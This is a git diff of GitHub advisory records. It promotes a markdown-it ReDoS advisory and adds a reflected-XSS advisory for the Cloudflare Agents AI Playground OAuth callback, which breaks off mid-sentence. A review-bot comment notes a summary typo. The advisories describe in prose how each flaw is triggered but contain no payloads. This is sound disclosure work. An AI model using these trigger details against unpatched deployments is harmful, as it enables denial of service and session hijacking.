.../GHSA-cvhv-6xm6-c3v4.json | 65 +++++++++++
.../GHSA-g433-pq76-6cmf.json | 103 ++++++++++++++++++
.../GHSA-cvhv-6xm6-c3v4.json | 34 ------
4 files changed, 199 insertions(+), 40 deletions(-)
rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json (67%)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-g433-pq76-6cmf/GHSA-g433-pq76-6cmf.json
delete mode 100644 advisories/unreviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
similarity index 67%
rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
index 89a716520ae70..8d068ccd0ebf8 100644
--- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-38c4-r59v-3vqw",
- "modified": "2026-02-12T06:30:13Z",
+ "modified": "2026-02-13T20:04:39Z",
"published": "2026-02-12T06:30:13Z",
"aliases": [
"CVE-2026-2327"
],
+ "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)",
"details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.",
"severity": [
{
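Review bot: The new `summary` line has a typo — "markdown-it is has a Regular Expression Denial of Service (ReDoS)" — and since `summary` is the title shown in feeds and notifications it should read `"summary": "markdown-it has a Regular Expression Denial of Service (ReDoS)"`. The rest of the promotion looks consistent: the `affected` range `13.0.0` … fixed `14.1.1` added in the next hunk matches the "from 13.0.0 and before 14.1.1" wording in `details`, and the later hunk's URL fix (`%23L33` → `#L33`) restores a working line anchor.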
@@ -14,10 +15,30 @@
},
{
"type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "markdown-it"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "13.0.0"
+ },
+ {
+ "fixed": "14.1.1"
+ }
+ ]
+ }
+ ]
}
],
- "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +52,13 @@
"type": "WEB",
"url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
},
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/markdown-it/markdown-it"
+ },
{
"type": "WEB",
- "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33"
+ "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33"
},
{
"type": "WEB",
@@ -45,8 +70,8 @@
"CWE-1333"
],
"severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:04:39Z",
"nvd_published_at": "2026-02-12T06:16:02Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
new file mode 100644
index 0000000000000..3cc25c3b3a55b
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cvhv-6xm6-c3v4",
+ "modified": "2026-02-13T20:04:56Z",
+ "published": "2026-02-13T03:31:23Z",
+ "aliases": [
+ "CVE-2026-1721"
+ ],
+ "summary": "Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground's OAuth callback handler",
+ "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline `